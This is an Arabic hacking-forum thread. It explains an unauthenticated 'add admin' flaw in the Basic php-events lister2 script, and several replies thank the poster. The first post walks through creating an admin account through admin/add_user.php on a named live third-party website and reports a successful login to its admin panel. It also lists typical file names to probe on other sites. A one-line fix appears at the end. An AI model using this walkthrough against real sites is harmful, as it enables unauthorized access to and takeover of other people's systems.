|
=>|| شرح + استغلال ثغرآت الـ Add Admin السلآم عليكم كيفكم ياشبآب ؟ اليوم درسنآ بيكون تطبيق مبآشر على ثغرة add user تحصلوها على الرآبط التآلي : http://www.exploit-db.com/exploits/10515/ الثغرة في سكربت : Basic php-events lister2 ================================= The exploit : Get in : http://localhost/path/admin/add_user.php and add your user .. Example : r7e@hotmail.com - 123456 Then get in : http://localhost/path/admin/login.php ================================= ------------------------------------------ شرح exploit يعني الاستغلال http://localhost/path/admin/add_user.php http://localhost <<< الموقع المصاب /path/ <<< الملف المصاب admin <<< مجلد الآدمن او لوحتة الادارة ... /add_user.php <<< من اسمووووا ضاهر شو بيعمل اضافة يوزر جديد ------------------------------------------ ################################################## ### انا جبت الضحيه :) http://easttexassolutions.com/events نجي للتطبيق ! http://easttexassolutions.com/events بعدها الى هنا admin/add_user.php يعني هيك http://easttexassolutions.com/events/admin/add_user.php الآن ادخل ايمايلك + الباس ^_^ username and password successfuly inserted! Login successful! بعدها http://easttexassolutions.com/events/admin get your msn + pass ... الآن انت داخل لوحة تحكم الآدمن :D ################################################## ### ************************************************* تم استغلآل الثغرة بنجآح ملاحضة مهمة : بآقلكم ثغرآت الـ Add Admin عآدة لها ملفآت محدده ووآضحه مثل addadmin.php add_admin.php admin_add.php user_add.php add_user.php ... وعآدة تكون ورآ لوحة التحكم ADMIN or cpanel ... تغرة جميلة ؟ :love: /////////////////////////////////////////////// طريقة الترقيع بسيطة وهي حذف ملف add_user.php or ... http://www10.0zz0.com/2011/05/29/17/394063459.png |
آسف على التقصير في الشرح، ان شاء الله شرح فيديوا، في انتضار نزول تغرات جديدة من هذا النوع |
ههههه مشكور اخي نور الدين |
تسلم أخي نوردين إن شاء الله يستفيد منها الأعضاء في أمان الله |
بارك الله فيك |
مشكورين يا احلا اعضاء |
ابداع ما قصرت |
^_^ |
| الساعة الآن 12:27 AM |
[ vBspiders.Com Network ]